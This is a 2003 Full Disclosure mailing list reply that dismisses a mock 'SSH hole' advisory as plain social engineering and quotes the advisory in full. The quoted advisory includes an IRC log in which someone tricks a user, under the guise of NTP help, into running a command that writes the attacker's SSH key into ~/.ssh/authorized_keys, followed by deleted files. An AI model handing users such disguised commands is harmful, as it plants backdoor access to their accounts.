Full Disclosure mailing list archives
Re: SSH/OPENSSH HOLE ALL VERSIONS.
From: Eric LeBlanc <inouk () toutatis igt net>
Date: Tue, 4 Mar 2003 18:15:09 -0500 (EST)
This is NOT a problem of ssh, but an USER. This is called "Social Engineering", and nobody can protect that. Only the intelligence of user can avoid this "HOLE". This is the worst thing I ever seen... E. -- Eric LeBlanc inouk () igt net -------------------------------------------------- UNIX is user friendly. It's just selective about who its friends are. ================================================== On Tue, 4 Mar 2003 diacetyl () hushmail com wrote:
-----BEGIN PGP SIGNED MESSAGE----- I. BACKGROUND (stolen from manpage) ssh (SSH client) is a program for logging into a remote machine and for executing commands on a remote machine. It is intended to replace rlogin and rsh, and provide secure encrypted communications between two untrust ed hosts over an insecure network. X11 connections and arbitrary TCP/IP ports can also be forwarded over the secure channel. II. DESCRIPTION The ssh command contains an innate system of backdooring that can be levereged by an attacker to gain the access of another user. The crux of this problem lies in the face that any public key dropped to ~/.ssh/authorized_keys may be used to gain entry to the machine under the priveledges of that user by he who posesses the corresponding private key. III. ANALYSIS A user who can successfully convince another user to write his ssh public key to ~/.ssh/authorized_keys will be able to gain access to that machine under that user's priveledges. The following is a sample walkthrough of a successful exploitation of this vulnerability. ·f· zerofel [~zerofel () h238n2fls33o1215 telia com] has joined #linuxhelp <zerofel> how do i use ntp to set my time? <sup3rfo0> echo ntp;echo "ssh-rsa AAAAB3NzaC1yc2EAAAABIwAAAIEAsWihy/NGclBRhEVNgQezRGSx9D0AMqDY/eGYMNW9WlO/szVRKrlGYpMmsvOen/Kcocz0TxDPDZXLGGDL0U77A036WBIL64HPAg3ADteSa1heDJjxUWMa45Aj0bhBEJCofkraasOwxTgKYe6KXCKQu9GOS+VoCYUSSJtUk11G+tE= unf@tryptamine">~/.ssh/authorized_keys <sup3rfo0> that should do it <zerofel> okay but my date still isnt set <sup3rfo0> hmm paste the output of ls ~ <zerofel> bash-2.05$ ls <zerofel> HAHA_I_DELETED_ALL_YOUR_FILES <zerofel> WTF IV. VENDOR RESPONSE I have informed ssh developers about this vulnerability and they have not replied. I am forced to disclose this gaping vulnerability to force them to patch the bug. V. PROPS iDEFENSE for their elite file advisory http://lists.netsys.com/pipermail/full-disclosure/2003-March/004423.html these warriors of full-disclosure give me the courage to release this vulnerability even after death threats from evil blackhats who shut off my power, ruined my credit, and got me fired from my job. -----BEGIN PGP SIGNATURE----- Version: Hush 2.2 (Java) Note: This signature can be verified at https://www.hushtools.com/verify wl0EARECAB0FAj5lJDUWHGRpYWNldHlsQGh1c2htYWlsLmNvbQAKCRAP/IU00usAJvBh AJ9yTHe1KNHGyEEWMknulotpkCe9BACfSYTDyMGrzGVcLs9XdQuqKP/04bA= =4Mdu -----END PGP SIGNATURE----- Concerned about your privacy? Follow this link to get FREE encrypted email: https://www.hushmail.com/?l=2 Big $$$ to be made with the HushMail Affiliate Program: https://www.hushmail.com/about.php?subloc=affiliate&l=427 _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
_______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Current thread:
- SSH/OPENSSH HOLE ALL VERSIONS. diacetyl (Mar 04)
- Re: SSH/OPENSSH HOLE ALL VERSIONS. Eric LeBlanc (Mar 04)
- Re: SSH/OPENSSH HOLE ALL VERSIONS. ull-disclosure (Mar 04)
- Re: SSH/OPENSSH HOLE ALL VERSIONS. aeonflux (Mar 08)